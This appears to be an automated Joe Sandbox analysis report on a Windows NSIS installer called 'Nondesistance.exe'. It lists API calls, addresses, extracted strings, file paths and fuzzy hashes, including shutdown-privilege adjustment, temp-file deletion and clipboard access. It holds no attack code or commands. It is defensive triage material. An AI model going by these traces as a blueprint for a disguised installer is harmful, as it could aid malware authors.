4531->4530 4533 100012a8 GlobalFree 4532->4533 4534 1000126f GlobalAlloc lstrcpynA 4532->4534 4533->4431 4534->4533 4536 100017c5 4535->4536 4537 100023ae 4535->4537 4536->4445 4536->4446 4537->4536 4538 100023c7 GlobalFree 4537->4538 4538->4537 4540 10001266 2 API calls 4539->4540 4541 10001503 4540->4541 4541->4439 4542->4453 4543->4480 4545 10001552 4544->4545 4545->4476 4552 10001215 GlobalAlloc 4546->4552 4548 10001233 lstrcpynA 4548->4475 4549->4480 4550->4471 4551->4478 4552->4548 4554 100012b4 4553->4554 4555 10001224 2 API calls 4554->4555 4556 100012cf 4555->4556 4556->4484 4558 10002581 4557->4558 4559 1000252b VirtualAlloc 4557->4559 4558->4491 4559->4558 4560->4520 4562 100012f9 4561->4562 4563 100012da 4561->4563 4562->4520 4563->4562 4564 100012e0 lstrcpyA 4563->4564 4564->4562 4565->4526 5159 401490 5160 404f48 25 API calls 5159->5160 5161 401497 5160->5161 4607 401595 4608 402a3a 18 API calls 4607->4608 4609 40159c SetFileAttributesA 4608->4609 4610 4015ae 4609->4610 5162 402616 5163 40261d 5162->5163 5166 40287c 5162->5166 5164 402a1d 18 API calls 5163->5164 5165 402628 5164->5165 5167 40262f SetFilePointer 5165->5167 5167->5166 5168 40263f 5167->5168 5170 405c8d wsprintfA 5168->5170 5170->5166 4616 401717 4617 402a3a 18 API calls 4616->4617 4618 40171e SearchPathA 4617->4618 4619 401739 4618->4619 5171 10001058 5173 10001074 5171->5173 5172 100010dc 5173->5172 5174 100014bb GlobalFree 5173->5174 5175 10001091 5173->5175 5174->5175 5176 100014bb GlobalFree 5175->5176 5177 100010a1 5176->5177 5178 100010b1 5177->5178 5179 100010a8 GlobalSize 5177->5179 5180 100010b5 GlobalAlloc 5178->5180 5181 100010c6 5178->5181 5179->5178 5182 100014e2 3 API calls 5180->5182 5183 100010d1 GlobalFree 5181->5183 5182->5181 5183->5172 5184 402519 5185 40252e 5184->5185 5186 40251e 5184->5186 5188 402a3a 18 API calls 5185->5188 5187 402a1d 18 API calls 5186->5187 5190 402527 5187->5190 5189 402535 lstrlenA 5188->5189 5189->5190 5191 405a49 WriteFile 5190->5191 5192 
402557 5190->5192 5191->5192 5193 40149d 5194 4014ab PostQuitMessage 5193->5194 5195 40226e 5193->5195 5194->5195 5196 100010e0 5198 1000110e 5196->5198 5197 100011c4 GlobalFree 5198->5197 5199 100012ad 2 API calls 5198->5199 5200 100011c3 5198->5200 5201 10001266 2 API calls 5198->5201 5202 10001155 GlobalAlloc 5198->5202 5203 100011ea GlobalFree 5198->5203 5204 100012d1 lstrcpyA 5198->5204 5205 100011b1 GlobalFree 5198->5205 5199->5198 5200->5197 5201->5205 5202->5198 5203->5198 5204->5198 5205->5198 5206 10002162 5207 100021c0 5206->5207 5208 100021f6 5206->5208 5207->5208 5209 100021d2 GlobalAlloc 5207->5209 5209->5207 5210 4046a3 5211 4046b3 5210->5211 5212 4046cf 5210->5212 5221 405509 GetDlgItemTextA 5211->5221 5214 404702 5212->5214 5215 4046d5 SHGetPathFromIDListA 5212->5215 5217 4046e5 5215->5217 5220 4046ec SendMessageA 5215->5220 5216 4046c0 SendMessageA 5216->5212 5219 40140b 2 API calls 5217->5219 5219->5220 5220->5214 5221->5216 5222 401ca7 5223 402a1d 18 API calls 5222->5223 5224 401cae 5223->5224 5225 402a1d 18 API calls 5224->5225 5226 401cb6 GetDlgItem 5225->5226 5227 402513 5226->5227 5228 404028 lstrcpynA lstrlenA 5229 4028aa SendMessageA 5230 4028c4 InvalidateRect 5229->5230 5231 4028cf 5229->5231 5230->5231 4678 4015b3 4679 402a3a 18 API calls 4678->4679 4680 4015ba 4679->4680 4681 40583a 4 API calls 4680->4681 4693 4015c2 4681->4693 4682 40161c 4684 401621 4682->4684 4685 40164a 4682->4685 4683 4057cc CharNextA 4683->4693 4686 401423 25 API calls 4684->4686 4687 401423 25 API calls 4685->4687 4688 401628 4686->4688 4695 401642 4687->4695 4697 405d2f lstrcpynA 4688->4697 4690 40548b 2 API calls 4690->4693 4691 4054a8 5 API calls 4691->4693 4692 401633 SetCurrentDirectoryA 4692->4695 4693->4682 4693->4683 4693->4690 4693->4691 4694 401604 GetFileAttributesA 4693->4694 4696 40540e 4 API calls 4693->4696 4694->4693 4696->4693 4697->4692 5232 4016b3 5233 402a3a 18 API calls 5232->5233 5234 4016b9 GetFullPathNameA 5233->5234 5235 4016f1 5234->5235 
5236 4016d0 5234->5236 5237 401705 GetShortPathNameA 5235->5237 5238 4028cf 5235->5238 5236->5235 5239 406033 2 API calls 5236->5239 5237->5238 5240 4016e1 5239->5240 5240->5235 5242 405d2f lstrcpynA 5240->5242 5242->5235 5243 4014b7 5244 4014bd 5243->5244 5245 401389 2 API calls 5244->5245 5246 4014c5 5245->5246 5247 401d38 GetDC GetDeviceCaps 5248 402a1d 18 API calls 5247->5248 5249 401d56 MulDiv ReleaseDC 5248->5249 5250 402a1d 18 API calls 5249->5250 5251 401d75 5250->5251 5252 405d51 18 API calls 5251->5252 5253 401dae CreateFontIndirectA 5252->5253 5254 402513 5253->5254 5255 404ebc 5256 404ee0 5255->5256 5257 404ecc 5255->5257 5259 404ee8 IsWindowVisible 5256->5259 5263 404eff 5256->5263 5258 404ed2 5257->5258 5267 404f29 5257->5267 5261 403f60 SendMessageA 5258->5261 5262 404ef5 5259->5262 5259->5267 5260 404f2e CallWindowProcA 5264 404edc 5260->5264 5261->5264 5265 404813 5 API calls 5262->5265 5263->5260 5266 404893 4 API calls 5263->5266 5265->5263 5266->5267 5267->5260 4698 40173e 4699 402a3a 18 API calls 4698->4699 4700 401745 4699->4700 4701 4059d1 2 API calls 4700->4701 4702 40174c 4701->4702 4703 4059d1 2 API calls 4702->4703 4703->4702 5268 401ebe 5269 402a3a 18 API calls 5268->5269 5270 401ec5 5269->5270 5271 406033 2 API calls 5270->5271 5272 401ecb 5271->5272 5274 401edd 5272->5274 5275 405c8d wsprintfA 5272->5275 5275->5274 5276 40193f 5277 402a3a 18 API calls 5276->5277 5278 401946 lstrlenA 5277->5278 5279 402513 5278->5279

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                  • GetVersion.KERNEL32 ref: 0040313A
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                  • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                  • GetCommandLineA.KERNEL32(Skuldertasken115 Setup,NSIS Error), ref: 004031BD
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Nondesistance.exe",00000000), ref: 004031D0
                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Nondesistance.exe",00000020), ref: 004031FB
                                                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                    • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                    • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                  • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                  • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                  • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                    • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                  • String ID: "$"C:\Users\user\Desktop\Nondesistance.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nondesistance.exe$C:\Users\user\dewater\reinsmen$C:\Users\user\dewater\reinsmen$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Skuldertasken115 Setup$TEMP$TMP$UXTHEME$\Temp$`K3w$~nsu
                                                                                                  • API String ID: 3329125770-1477354821
                                                                                                  • Opcode ID: 2a4e45490e6ca04841cd56f5ac96f25520fff28ec32ec90da2ff32a4d7a4cf5b
                                                                                                  • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                  • Opcode Fuzzy Hash: 2a4e45490e6ca04841cd56f5ac96f25520fff28ec32ec90da2ff32a4d7a4cf5b
                                                                                                  • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                  • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                    • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,?,00403D7A), ref: 00403F57
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                                                  • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                  • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                  • CreatePopupMenu.USER32 ref: 00405310
                                                                                                  • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405325
                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                  • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                  • EmptyClipboard.USER32 ref: 004053B0
                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                  • SetClipboardData.USER32(?,00000000), ref: 004053FB
                                                                                                  • CloseClipboard.USER32 ref: 00405401
                                                                                                  Strings
                                                                                                  • Skuldertasken115 Setup: Installing, xrefs: 00405376
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID: Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 590372296-1232910203
                                                                                                  • Opcode ID: 55b9db7a2fcc10364cc793a09e221b9681578bfcfc0c0d8e32da0e63cc10e039
                                                                                                  • Instruction ID: b5f1ce2ce4d05df4ba5ebffd303825d409c0ca4f752acec20acacd4dcda6ac6e
                                                                                                  • Opcode Fuzzy Hash: 55b9db7a2fcc10364cc793a09e221b9681578bfcfc0c0d8e32da0e63cc10e039
                                                                                                  • Instruction Fuzzy Hash: C9A14871900208BFEB119FA0DD89AAE7F79FB08354F10407AFA01BA1A0C7755E51DF69

                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                                  • ShowWindow.USER32(?), ref: 00403A9A
                                                                                                  • DestroyWindow.USER32 ref: 00403AAE
                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403BB4
                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                                  • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403C29
                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D33
                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D52
                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                                  • lstrlenA.KERNEL32(Skuldertasken115 Setup: Installing,?,Skuldertasken115 Setup: Installing,Skuldertasken115 Setup), ref: 00403D8E
                                                                                                  • SetWindowTextA.USER32(?,Skuldertasken115 Setup: Installing), ref: 00403D9D
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                  • String ID: Skuldertasken115 Setup$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 3282139019-1074452773
                                                                                                  • Opcode ID: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
                                                                                                  • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                                  • Opcode Fuzzy Hash: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
                                                                                                  • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                                                                  APIs
                                                                                                  • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000), ref: 00405E02
                                                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E7D
                                                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E90
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,0041B020), ref: 00405ECC
                                                                                                  • SHGetPathFromIDListA.SHELL32(0041B020,Call), ref: 00405EDA
                                                                                                  • CoTaskMemFree.OLE32(0041B020), ref: 00405EE5
                                                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000), ref: 00405F59
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 900638850-734733351
                                                                                                  • Opcode ID: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
                                                                                                  • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                  • Opcode Fuzzy Hash: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
                                                                                                  • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4227406936-0
                                                                                                  • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                  • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                  • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                  • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNELBASE(?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                  • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                  • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                  • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Nondesistance.exe", xrefs: 004055D1
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                  • \*.*, xrefs: 0040563C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                  • API String ID: 2035342205-3436785771
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(00407514,?,?,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                  Strings
                                                                                                  • C:\Users\user\dewater\reinsmen, xrefs: 0040211D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                  • String ID: C:\Users\user\dewater\reinsmen
                                                                                                  • API String ID: 123533781-140973065
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(77323410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 2295610775-0
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0

                                                                                                  Control-flow Graph

                                                                                                  • Graph starting at block 4036af-4036c7; blocks are marked Executed or Not Executed.
                                                                                                  APIs
                                                                                                    • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                    • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                  • lstrcatA.KERNEL32(1033,Skuldertasken115 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Skuldertasken115 Setup: Installing,00000000,00000002,77323410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nondesistance.exe",00000000), ref: 0040372A
                                                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\dewater\reinsmen,1033,Skuldertasken115 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Skuldertasken115 Setup: Installing,00000000,00000002,77323410), ref: 0040379F
                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 004037BD
                                                                                                  • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\dewater\reinsmen), ref: 00403806
                                                                                                    • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                  • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                                  • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\dewater\reinsmen$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Skuldertasken115 Setup: Installing$_Nb
                                                                                                  • API String ID: 1975747703-2333544106

                                                                                                  Control-flow Graph

                                                                                                  • Graph starting at block 402c66-402cb4; blocks are marked Executed or Not Executed.
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Nondesistance.exe,00000400), ref: 00402C93
                                                                                                    • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004059A6
                                                                                                    • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nondesistance.exe,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 00402CDF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nondesistance.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$uR
